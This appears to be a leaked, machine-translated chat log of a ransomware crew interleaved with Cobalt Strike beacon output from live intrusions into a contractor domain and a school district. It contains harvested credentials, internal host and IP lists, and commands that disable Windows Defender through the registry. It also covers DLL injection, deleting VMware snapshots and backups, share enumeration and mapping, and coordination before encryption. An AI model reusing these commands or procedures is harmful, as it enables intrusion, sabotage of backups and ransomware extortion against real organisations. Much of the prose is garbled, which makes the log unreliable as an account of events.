[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 143 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds sslvpn:4311_Secure@10.1.1.45

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds

[**] Found bookmark with creds
[+] Found bookmark {'name': '1', 'username': 'sslvpn', 'password': '4311_Secure', 'service': 'RDP', 'host': '10.1.1.45'}
com/group/1-done-expederal-com?msg=G2z6E3Dm4XPiahEer) no)) backups were on the wine servers1.done.expFederal.com there were not vim? so we can not do anything with them linux software we have no@user4 fuck you revealed all the cards))
USCHI-DT005.Hobbes.loc [10.20.20.37]
sh-0004.hobbes.loc [10.20.4.4]
DT-000016.Hobbes.loc [10.20.20.53]
LT-000047.Hobbes.loc [10.20.99.175]
LT-000060.Hobbes.loc [10.20.20.30]
USCHI-TB001.Hobbes.loc [10.20.99.173]
LT-000073.Hobbes.loc [10.20.99.172]
uschi-psc001.hobbes.loc [10.20.4.56]
TB-000025.Hobbes.loc [10.20.99.151]
USCHI-HR-LT201.Hobbes.loc [10.20.99.153]
TB-000028.Hobbes.loc [10.20.20.22]
TB-000034.Hobbes.loc [10.20.99.160]
DT-000037.Hobbes.loc [10.20.20.71]+
USCHI-AI-LT321.Hobbes.loc [10.20.99.178]
LT-000116.Hobbes.loc [10.20.99.172]
USCHI-PM-DT607.Hobbes.loc [10.20.32.201]
USCHI-EM-LT403.Hobbes.loc [10.20.20.23]
USCHA-EX-LT003.Hobbes.loc [10.6.0.105]
```
These are linux armas (at least they have no ipc$ or admin$ or c$ yb d$, etc.) ```
Host Name: USCHI-SBS002
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00377-70390-48722-AA601
Original Install Date: 5/15/2019, 3:10:42 PM
System Boot Time: 12/9/2020, 5:51:51 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~1700 Mhz
                           [02]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~1700 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 16,383 MB
Available Physical Memory: 15.093 MB
Virtual Memory: Max Size: 18,815 MB
Virtual Memory: Available: 17,620 MB
Virtual Memory: In Use: 1,195 MB
Page File Location(s): C:\pagefile.sys
Domain: Hobbes.loc
Logon Server: N/A
Hotfix(s): 13 Hotfix(s) Installed.
                           [01]: KB3186568
                           [02]: KB4049065
                           [03]: KB4494175
                           [04]: KB4498947
                           [05]: KB4503537
                           [06]: KB4520724
                           [07]: KB4524244
                           [08]: KB4540723
                           [09]: KB4550994
                           [10]: KB4562561
                           [11]: KB4565912
                           [12]: KB4576750
                           [13]: KB4593226
Network Card(s): 2 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Internal
                                 DHCP Enabled: No
                                 IP address(es).
                                 [01]: 10.20.32.20
                           [02]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: External
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.111.1.64
                                 [02]: 10.111.1.63
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

```
I found this shit, here's some hosts spinning under 1 ipi153 was alive on the input) and 57 arms of 10053 servers of which 46153 hosts[ ](https://mediaeveryone.com/group/expfederal-com?msg=kfJRgvJSmNwimgd78) arms exactly enough? I can not say more than that of the ones I work with, they are my favorite from top to bottom u v w x y z```
Disconnected U:        \10.111.1.32\C$ Microsoft Windows Network
Disconnected V: \10.20.32.200$ Microsoft Windows Network
Disconnected W:        \10.20.32.103$ Microsoft Windows Network
OK X:        \10.20.32.101$ Microsoft Windows Network
OK Y:        \10.20.32.202\C$ Microsoft Windows Network
OK Z:        \10.20.32.21\C$ Microsoft Windows Network

I had a few servers that neither vmik, nor jump, nor remot eksekzekom did not attract30 unique ip armies)
10.20.20.46
10.20.20.37
10.20.20.50
10.20.32.90
10.20.4.4
10.20.20.53
10.20.99.150
10.20.99.163
10.20.99.158
10.20.99.175
10.20.20.31
10.20.20.30
10.20.99.152
10.20.99.173
10.20.99.172
10.20.99.159
10.6.0.105
10.20.4.56
10.20.20.56
10.20.99.151
10.20.99.154
10.20.99.153
10.20.20.22
10.20.99.156
10.20.99.160
10.20.20.71
10.20.99.178
10.20.99.180
10.20.32.201
10.20.20.23
``52 unique ip''
10.20.32.100
10.111.2.20
10.20.32.28
10.111.1.31
10.111.1.15
10.111.2.15
10.20.32.203
10.111.1.32
10.20.32.200
10.20.32.93
10.20.32.34
10.20.32.40
10.20.32.31
10.111.1.33
10.20.32.13
10.20.32.14
10.20.32.6
10.20.32.4
10.20.32.20
10.20.32.30
10.20.32.18
10.20.32.72
10.20.32.175
10.20.32.24
10.6.0.5
10.6.0.56
10.6.0.58
10.20.32.71
10.20.32.70
10.20.32.188
10.6.0.30
10.20.32.33
10.20.32.50
10.111.1.50
10.20.32.5
10.20.32.7
10.20.32.60
10.20.32.75
10.20.32.76
10.111.1.10
10.20.32.15
10.20.32.202
10.6.0.60
10.20.32.21
10.20.32.101
10.20.32.102
10.20.32.103
10.20.32.45
10.20.32.73
10.20.32.74
10.20.32.46
10.20.32.110
i had a report on the pings of the servers? 46 ip53 hostname or did you count 53 and 46 by ip? because hostnames refer to the same ip53 = 46? 46 servers shut down100 armas and nix53 serversa total of 153 live hostnames were with armas as soon as the servers 53
```
LT-000082.Hobbes.loc [10.20.99.175]
LT-000047.Hobbes.loc [10.20.99.175]
``[ ](https://mediaeveryone.com/group/expfederal-com?msg=z4FdusPQAXacvdFZj) total livehosts 53? so they have a few hostnames per ip53a fuck the number of livehosts in generalaahaa those 7 servers that are not closed what about them? 53 servers alive, 89 were in adcom how many live were otklabbed servers somehow not enough236 in adcom, there a bunch of old not thick however...236 comps total
53 pinged servers, closed 46
57 pinged armies, closed 39 and with armies so jeservers/closed servers shut downstatuvezde there are notes for stats guys18 armies minusda)),kznm```
Teemo beacon> net dclist
[*] Tasked beacon to run net dclist
[+] host called home, sent: 104506 bytes
[+] received output:
DCs:


[+] received output:
 Server Name IP Address Platform Version Type Comment
 ----------- ---------- -------- ------- ---- -------
[-] Error: 6118
```

```
beacon> shell nltest /dclist:Hobbes
[*] Tasked beacon to run: nltest /dclist:Hobbes
[+] host called home, sent: 52 bytes
[+] received output:
Get list of DCs in domain 'Hobbes' from '\\USCHA-DCG002'.
      PCHIDCG003.Hobbes.loc [DS] Site: Chicago
      PCHIDCG004.Hobbes.loc [DS] Site: Chicago
    USCHI-DCP001.Hobbes.loc [DS] Site: Chicago
    USCHA-DCG002.Hobbes.loc [DS] Site: WDC
    USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport
    USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago
      PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ
         sh-0004.hobbes.loc [RODC]
The command completed successfully
```
```
Teemo beacon> shell nltest /dclist:Hobbes.loc
[*] Tasked beacon to run: nltest /dclist:Hobbes.loc
[+] host called home, sent: 56 bytes
[+] received output:
Get list of DCs in domain 'Hobbes.loc' from '\\USCHA-DCG002.Hobbes.loc'.
      PCHIDCG003.Hobbes.loc [DS] Site: Chicago
      PCHIDCG004.Hobbes.loc [DS] Site: Chicago
    USCHI-DCP001.Hobbes.loc [DS] Site: Chicago
    USCHA-DCG002.Hobbes.loc [DS] Site: WDC
    USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport
    USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago
      PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ
         sh-0004.hobbes.loc [RODC]
The command completed successfully


``Fucking figured it out... You need to do an inject in the winlagon, then the flight is normal. and one is not pinged so there is already a note everywhere this does not always work immediately check the other way ``
Teemo beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:


[+] received output:
[-] Error: 0
I have a lot of trouble with this, I can't get it to work, I'm not sure if it's working, but it's not working. wait for confirmation from voodootry it through eheav and def off? did not help gjvjukj that will be the current state you are here should remain uninstall they are replicated look, we have two snapshots, if we delete them, then we will also rub the machine?or the classic way to mask the disks somewhere try to offload av, vindefTry different archa in general clean the root home folder root[ ](https://mediaeveryone.com/group/expfederal-com?msg=6dKMvPj8Za59kfYWw) the command below is what? hang 20 minisli avers or something like that there is nothing - check if the bitness of the injected dll match the bitness of the system
[root@uschi-vhp001:~] cat /etc/passwd
root:x:0:0:Administrator:/:/bin/sh
daemon:x:2:2:System daemons:/:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/:/sbin/nologin
dcui:x:100:100:DCUI User:/:/sbin/nologin
vpxuser:x:500:100:VMware VirtualCenter administration account:/:/bin/sh
rootmgmt:x:1000:1000:ESXi User:/:/bin/sh
vxpsvc_ptagent_op:x:1001:1001:ESXi User:/:/bin/sh

``If it gets up, it means that the injection process itself is being tapped by an aver or something[ ](https://mediaeveryone.com/group/expfederal-com?msg=ppyLCj2p7LQ9XuXpp) strange but there seems to be nothing to clean it hangs? or "gets up" ?on some armasPrimary injection kryptor session hangs you hope to clean the history of commands in linigui bluntly still such a thing through the gui better`rm -rf vmfs/volumes` look in the properties / settings no))) you there lin not format) and how to delete the previous snapshots, so as not to lose the current one?)leave the current state and run it there and delete the snapshots in the wmoknea, go to the web as before, delete the snapshots and leave the current state from the center in the web interface where do you delete them?)rm -rf so ok? also in the processesnaps removed from the center and with veem resolved the issue? in the rest everywhere there is a note these left to reattach and armas * if everything is ok, close dk check all servers for a note + armas also all?dk almost all the servers, only to re-sleep a couple of units)) but they work, apparently the session with the proxy hung upa, we thought the niks servers sphere rejectedda hz) and what shutdown you were talking about at all?) on niks lienapshots are deletedna we pulled these virtual servers, their polochimna that shutdown like what? *napshots started delete backupova virtual disks where these servers lie? can you get them to lock or are they on the nix somewhere? armas have pulled or pull armas already pulled it better when all pull it now tear it downDid you remove the 74 seksnapshots removed? no, ping passed[ ](https://mediaeveryonecom/group/expfederal-com?msg=2mcqWpWjKLkka3NdD) maybe they have a notifier to log on the csi or something is worth ... are you talking about the sphere? they probably turned off the not good? took off the network? @tl2 @tl1 servers with virtual machines removed from the network. our actions? 10.111.2.20 another dk not attracted?
10.20.32.101
10.20.32.21
10.20.32.202
10.111.1.10
```
servers, no dns and dk for later ```.
Get list of DCs in domain 'HOBBES' from '\\USCHI-DCP001'.
      PCHIDCG003.Hobbes.loc [DS] Site: Chicago
      PCHIDCG004.Hobbes.loc [DS] Site: Chicago
    USCHI-DCP001.Hobbes.loc [DS] Site: Chicago
    USCHA-DCG002.Hobbes.loc [DS] Site: WDC
    USCHI-DCG001.Hobbes.loc [DS] Site: Chicago-DMZRWDCSupport
    USCHI-DCG003.Hobbes.loc [PDC] [DS] Site: Chicago
      PCHIDCG002.Hobbes.loc [RODC] [DS] Site: Chicago-DMZ
         sh-0004.hobbes.loc [RODC]
``Take everything into the coba, or how then mapi armas on the server) suddenly, and we have already rubbed) no yet, the build waited[ ](https://mediaeveryone.com/group/expfederal-com?msg=a9ZRNruNqr5WfySKo) have you done it?
SIOJDG*(H78SHD(HGL(&SE*FHUiWESY&*(HJGI
``Are we done with the centersof the sphere? Do we have to disable vindef and sofos?
the new build seems to be working, right? now on the fast, we'll pull the servers into the cobu user 7@tl1 will now give the build the contents of the cryptimnu image yes
just snapshots tear down wait for build)well @tl2backup server also found in hellcompact they had two nix servers in hell under the allsphere, now one is not available, the other whether not working, or not configured
and these two that were found, not visible in ad comp - there are stored snapshots
sofos admin foundnu we just overwrite them, right?[ ](https://mediaeveryone.com/group/expfederal-com?msg=5ptz5FSD23puGa8zk) under the root came here. is there a build under the lin?
@echo off
for /f %%i in (hosts.txt) do (
	tasklist /s %%i /v >> .\ps.txt
)
``webrootanywhere``wsndomain.com - do not touch
``itc-us.com`` - work with her by kerbals by the way? if you use zerologon successfully there will be a chance to drink in the next day i think, so if you do it till the end today you can do it via @otam where today you will take YES you can finish it carefully can not promise anythingKILL THE NET INSTRUCTOR UP, HE CAN DO IT!before you go to groups, write down what's at what stage and don't kill the networkDisassemble the tool:fingers_crossed:where there are deadlocks today,//www.trendmicro.com/en_us/what-is/zerologon.htmlдо 12 today, not working on weekendsmonitor the input cob for new sessionswrite in groups that are active now and statuscom in the workIf there are new throw there, work what about the sessions? I have them off4 and 7priloveWhere are the rest of you? everyone Hello so already added? `itc-us-com `conf name where to add itc-us-com What is it? ITC.LOCAL turns out so#itc-us-com ?ITCMA and no yes there is a system I and user7 help user1 now I will add you to the team of free users write to the group where there is no system Yes tomorrow will be clear or without allThis weekend without me.And since you did not sleep tomorrow I will divide the day on "today - sleep - tomorrow" and not today then why tomorrow is tomorrow = today? tomorrow will be clear is still conditional info!!!!!!!!!!!!!!!!!!!!!!!!Saturday will be a day off, as well as on Sunday do we raise the system to 7 Yes? tomorrow = today tomorrow by 3 today until 7 Write the statuses in the active groups. how are you doing? ok, you have time to do some research, but there is no time at night we are closing the grid? if so, we have to hurry to start it while they have nightfall! it looks like they are still coming! hello where is @user3 ?hii all have a good day off fridayiday :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup:at 6 pm on9that is today? or sleep =tomorrow1.tomorrow on thursday friday extra day off tomorrow by 6 p.m. 610 mina although stop probably I won't keep you up long :thumbsup:sleep till 10 so you said today let's sleep the sessions don't kill good job well done good guys today at 10 p.m. i mean today or at 10 p.m. i hope so) tomorrow is Thursday? no)morning? tomorrow by 10 then all of 277 23 or no pings or can not pull then servers[ ](https://mediaeveryonecom/group/sisd-net?msg=25bsnyQBjuzt8dybR) on two domains on the second domain servers?report on the 2 domainsomotely97 servers that could not jump all the disks pulled up and in the second what do we have? in our coba 153 servers.all? raise sagging 2 and remains dk finished? 13 what's left? in 20 minutes I think you can manage56 in 11 for each how much? not a lot of servers left? no so what's done? not all, do not break 7772 is NAS3 only on the free? tomorrow sleep on the gold? continue to dazhe i started the build, check the udm and then mappy went all server map closed? no sure, maybe 1000 somewhere or something smaller i thought you all are not finished? so servers with unmapped armaments close? skype a report on how many closed armaments and servers and basically kill them in a small domain
beacon> shell systeminfo
[*] Tasked beacon to run: systeminfo
[+] host called home, sent: 41 bytes
[+] received output:

Host Name: AHS-VIDEO
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-70000-00000-AA535
Original Install Date: 8/4/2016, 10:49:05 AM
System Boot Time: 11/30/2020, 7:44:12 AM
System Manufacturer: Dell Inc.
System Model: PowerEdge R230
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3504 Mhz
BIOS Version: Dell Inc. 2.3.2, 11/16/2017
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: N/A
Time Zone: (UTC-07:00) Mountain Time (US & Canada)
Total Physical Memory: 32.599 MB
Available Physical Memory: 22,622 MB
Virtual Memory: Max Size: 37.463 MB
Virtual Memory: Available: 23,901 MB
Virtual Memory: In Use: 13,562 MB
Page File Location(s): C:\pagefile.sys
Domain: admin.sisd.k12
Logon Server: N/A
Hotfix(s): 185 Hotfix(s) Installed.
                           [01]: KB2868626
                           [02]: KB2883200
                           [03]: KB2887595
                           [04]: KB2894029
                           [05]: KB2894179
                           [06]: KB2894852
                           [07]: KB2903939
                           [08]: KB2911106
                           [09]: KB2919355
                           [10]: KB2919394
                           [11]: KB2928680
                           [12]: KB2934520
                           [13]: KB2938066
                           [14]: KB2954879
                           [15]: KB2966826
                           [16]: KB2966828
                           [17]: KB2967917
                           [18]: KB2968296
                           [19]: KB2972103
                           [20]: KB2989930
                           [21]: KB3000483
                           [22]: KB3000850
                           [23]: KB3003057
                           [24]: KB3004545
                           [25]: KB3012235
                           [26]: KB3012702
                           [27]: KB3013172
                           [28]: KB3013531
                           [29]: KB3013538
                           [30]: KB3013769
                           [31]: KB3013791
                           [32]: KB3013816
                           [33]: KB3014442
                           [34]: KB3015696
                           [35]: KB3018133
                           [36]: KB3019978
                           [37]: KB3021910
                           [38]: KB3023219
                           [39]: KB3023266
                           [40]: KB3024751
                           [41]: KB3024755
                           [42]: KB3030947
                           [43]: KB3033446
                           [44]: KB3035126
                           [45]: KB3036612
                           [46]: KB3037576
                           [47]: KB3038002
                           [48]: KB3042085
                           [49]: KB3044374
                           [50]: KB3044673
                           [51]: KB3045634
                           [52]: KB3045685
                           [53]: KB3045717
                           [54]: KB3045719
                           [55]: KB3045755
                           [56]: KB3045999
                           [57]: KB3046017
                           [58]: KB3046737
                           [59]: KB3054169
                           [60]: KB3054203
                           [61]: KB3054256
                           [62]: KB30544464
                           [63]: KB3055323
                           [64]: KB3055343
                           [65]: KB3059317
                           [66]: KB3060681
                           [67]: KB3060793
                           [68]: KB3061512
                           [69]: KB3063843
                           [70]: KB3071756
                           [71]: KB3072307
                           [72]: KB3074228
                           [73]: KB3074545
                           [74]: KB3076949
                           [75]: KB307715
                           [76]: KB3078405
                           [77]: KB3080149
                           [78]: KB3084135
                           [79]: KB3084905
                           [80]: KB3086255
                           [81]: KB3087137
                           [82]: KB3091297
                           [83]: KB3094486
                           [84]: KB3095701
                           [85]: KB3097992
                           [86]: KB3099834
                           [87]: KB3100473
                           [88]: KB3102429
                           [89]: KB3103616
                           [90]: KB3103696
                           [91]: KB3103709
                           [92]: KB3109103
                           [93]: KB3109560
                           [94]: KB3109976
                           [95]: KB3110329
                           [96]: KB3115224
                           [97]: KB3118401
                           [98]: KB3121261
                           [99]: KB3123245
                           [100]: KB3126434
                           [101]: KB3126587
                           [102]: KB3127222
                           [103]: KB3133043
                           [104]: KB3133690
                           [105]: KB3134179
                           [106]: KB3134815
                           [107]: KB3135782
                           [108]: KB3137728
                           [109]: KB3138378
                           [110]: KB3138602
                           [111]: KB3138910
                           [112]: KB3138962
                           [113]: KB3139164
                           [114]: KB3139398
                           [115]: KB3139914
                           [116]: KB3140219
                           [117]: KB3140234
                           [118]: KB3145384
                           [119]: KB3145432
                           [120]: KB3146604
                           [121]: KB3146723
                           [122]: KB3146751
                           [123]: KB3147071
                           [124]: KB3155784
                           [125]: KB3156059
                           [126]: KB3159398
                           [127]: KB3161949
                           [128]: KB3162343
                           [129]: KB3162835
                           [130]: KB3172614
                           [131]: KB3172729
                           [132]: KB3173424
                           [133]: KB3175024
                           [134]: KB3178539
                           [135]: KB3179574
                           [136]: KB3185319
                           [137]: KB3186539
                           [138]: KB4033369
                           [139]: KB4033428
                           [140]: KB4040972
                           [141]: KB4040974
                           [142]: KB4040981
                           [143]: KB4041777
                           [144]: KB4043763
                           [145]: KB4048951
                           [146]: KB4049179
                           [147]: KB4054566
                           [148]: KB4054854
                           [149]: KB4056887
                           [150]: KB4095875
                           [151]: KB4096417
                           [152]: KB4098972
                           [153]: KB4103729
                           [154]: KB4338832
                           [155]: KB4457009
                           [156]: KB4457015
                           [157]: KB4457034
                           [158]: KB4457045
                           [159]: KB4457146
                           [160]: KB4459935
                           [161]: KB4459941
                           [162]: KB4462930
                           [163]: KB4477029
                           [164]: KB4480054
                           [165]: KB4480064
                           [166]: KB4480095
                           [167]: KB4480979
                           [168]: KB4483187
                           [169]: KB4483450
                           [170]: KB4483459
                           [171]: KB4486105
                           [172]: KB4487038
                           [173]: KB4493478
                           [174]: KB4532931
                           [175]: KB4532940
                           [176]: KB4532946
                           [177]: KB4534117
                           [178]: KB4537759
                           [179]: KB4552933
                           [180]: KB4552982
                           [181]: KB4561600
                           [182]: KB4565613
                           [183]: KB4565635
                           [184]: KB4566425
                           [185]: KB4565541
Network Card(s): 6 NIC(s) Installed.
                           [01]: Intel(R) Gigabit 4P I350-t Adapter
                                 Connection Name: Synology1
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 192.168.4.5
                           [02]: Intel(R): Intel(R) Gigabit 4P I350-t Adapter
                                 Connection Name: Synology2
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 192.168.4.1
                           [03]: Intel(R): Intel(R) Gigabit 4P I350-t Adapter
                                 Connection Name: Slot 1 Port 3
                                 Status: Hardware not present
                           [04]: Intel(R) Gigabit 4P I350-t Adapter
                                 Connection Name: Slot 1 Port 4
                                 Status: Media disconnected
                           [05]: Broadcom NetXtreme Gigabit Ethernet
                                 Connection Name: NIC1
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.11.200.121
                                 [02]: fe80::5023:321f:3ab4:86d7
                           [06]: Broadcom NetXtreme Gigabit Ethernet
                                 Connection Name: NIC2
                                 Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: Yes
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes

``Well, what's cool besides dns and dkpolly? Did you close the second domain? Give me more sisteminfo of this session and everything ok try the exe`` ``
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t reg_dword /d 0 /f
The operation completed successfully.


C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f
The operation completed successfully.


C:\ProgramData>reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
Access is denied.

C:\ProgramData>reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v Start /t REG_DWORD /d 4 /f
The operation completed successfully.


``Second domain kst closed? drop windef@user8 and try through ehenhene broke DNS, DCserver632dllinject - architecture - gonet, session what? How should I know[ ](https://mediaeveryone.com/group/sisd-net?msg=xBtYErQTfxN43GxQj) and what is this? yes:all servers were closed?
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 217711 bytes
[-] relocation truncated to fit (distance between executable code and other data is >4GB)
``Yeah, and then the eyes in a bunch alreadyCHae when will dc break? work prettak so what do you have there? The main thing that the session did not fall offkv in the process just about this yanu like the udmi is, and the format does not all change the filesa udmi?well there not all files appear .HWOEU or something like that? only readme.txtfile kst appearedsession should be aliveopen it pliz2860dai pid bicona and tdnase close the server with hrvNo c.lf` ``
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 217711 bytes
[+] received output:
Injected.
[+] host called home, sent: 19 bytes
[+] host called home, sent: 20 bytes

``Launch a zamapilid server in parallel do we drop mapping and start encrypting? here.lflisting C:how do we know what works? in the session where mapping under any kredavs? blank dllinject field in the argument what to put in?
	Geordi.sisd.k12 [PDC] [DS] Site: DoTs
	Picard.sisd.k12 [DS] Site: DoTs
	   Lor.sisd.k12 [DS] Site: Ed-Center
``````
 ADMINDC5 10.0.61.13
 ADMINDC1 10.0.61.2
 ADMINDC3 10.0.61.6
 ADMINDC4 10.0.61.7
 ADMINDC2 10.0.61.10
 SPOCK 10.7.51.3
 AZUREDC1 10.221.32.4
``To the very last, do NOT TAKE THEM AND DON'T TAKE THEM, specify the appropriate bit rate dllllaunch via dllinjest on servers where it is mapped in full``SDFHGS*^EFG*&WE`t have any fuckin` left?[ ](https://mediaeveryone.com/group/sisd-net?msg=ATRhRQckBAaXAgA4f) by two, but ours is the least of itServers are starting to hang you by 3 kobas divided? We are starting to hang what mapi - mapiem then continue the list``
beacon> shell net view \10.16.239.134\
[*] Tasked beacon to run: net view \\10.16.239.134\
[+] host called home, sent: 56 bytes
[+] received output:
There are no entries in the list.

Then there's no resonance? Did you use the IP to map? I got 50 out of 200 armies - 30% - The network path was not found.
70% - The network path was not found.I leave those servers and go map armies?
beacon> shell net use * \\10.0.53.26\dump
[*] Tasked beacon to run: net use * \\\10.0.53.26\dump
[+] host called home, sent: 58 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.


beacon> shell net use * \\10.0.53.26\engrade
[*] Tasked beacon to run: net use *\\\10.0.53.26\engrade
[+] host called home, sent: 61 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

``Map everything or one of them? Not yet```
beacon> shell net view \10.0.53.26\
[*] Tasked beacon to run: net view \10.0.53.26\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \10.0.53.26\.



Share name Type Used as Comment

-------------------------------------------------------------------------------
dump Disk
engrade Disk
Import_Services Disk
SMDIM Disk
VT_Integration Disk
The command completed successfully.
```
Did you copy these?
beacon> shell net view \10.0.53.26\
[*] Tasked beacon to run: net view \10.0.53.26\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \10.0.53.26\.



Share name Type Used as Comment

-------------------------------------------------------------------------------
dump Disk
engrade Disk
Import_Services Disk
SMDIM Disk
VT_Integration Disk
The command completed successfully.


beacon> shell net view \10.0.50.1\
[*] Tasked beacon to run: net view \10.0.50.1\
[+] host called home, sent: 52 bytes
[+] received output:
There are no entries in the list.


beacon> shell net view \10.0.53.25\
[*] Tasked beacon to run: net view \10.0.53.25\
[+] host called home, sent: 53 bytes
[+] received output:
There are no entries in the list.

``the same story``
beacon> shell net view \10.51.200.121\
[*] Tasked beacon to run: net view \10.51.200.121\
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.


``Check with another server, are those from ``??''?
- MY-SISD-NFS: 10.0.61.61 ?
- VIDEO-SOH: 10.13.200.122 mapped
- VDI-PVS: 10.210.0.40 mapped
- STU-HOME: 10.0.61.57 ???
- T-HYPERV: 10.0.53.230 ???
- SESROEVIDEOSVR: 10.116.200.121 ???
- RIERHM-VIDEOSVR: 10.58.200.121 ???
- SQLCLUSTER: 10.0.53.25 ???
- VDI-PVS01-2: 10.210.0.51 mapped
- STU-SERVER: 10.0.50.1 ???
- VDI-PVS02-1: 10.210.0.42 mapped
- VDI-XD02: 10.210.0.62 mapped
- VDI-PVS01-1: 10.210.0.41 mapped
- VDI-XD01: 10.210.0.61 mapped.
- NPM-01: 10.0.51.84 mapped
- CAUSQLCL8wx: 10.0.53.24 mapped
- VDI-PVS02-2: 10.210.0.52 mapped
- CLARKE-SVE: 10.51.200.121 ?
- TylerSISCluster: 10.0.53.26 ???
- CATE-NAS: 10.0.61.69 mapped
``````
beacon> shell net view \10.0.61.61\
[*] Tasked beacon to run: net view \10.0.61.61\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \10.0.61.61\



Share name Type Used as Comment

-------------------------------------------------------------------------------
Scann Disk
The command completed successfully.


beacon> shell net view \10.0.61.57\
[*] Tasked beacon to run: net view \10.0.61.57\
[+] host called home, sent: 53 bytes
[+] received output:
There are no entries in the list.


beacon> shell net view \10.0.53.230\
[*] Tasked beacon to run: net view \10.0.53.230\
[+] host called home, sent: 54 bytes
[+] received output:
There are no entries in the list.


beacon> shell net view \10.116.200.121\
[*] Tasked beacon to run: net view \10.116.200.121\
[+] host called home, sent: 57 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.


beacon> shell net view \10.58.200.121\
[*] Tasked beacon to run: net view \10.58.200.121\
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.


beacon> shell net view \10.0.53.25\
[*] Tasked beacon to run: net view \10.0.53.25\
[+] host called home, sent: 53 bytes
[+] received output:
There are no entries in the list.


beacon> shell net view \10.0.50.1\
[*] Tasked beacon to run: net view \10.0.50.1\
[+] host called home, sent: 52 bytes
[+] received output:
There are no entries in the list.


beacon> shell net view \10.0.53.26\
[*] Tasked beacon to run: net view \10.0.53.26\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \10.0.53.26\.



Share name Type Used as Comment

-------------------------------------------------------------------------------
dump Disk
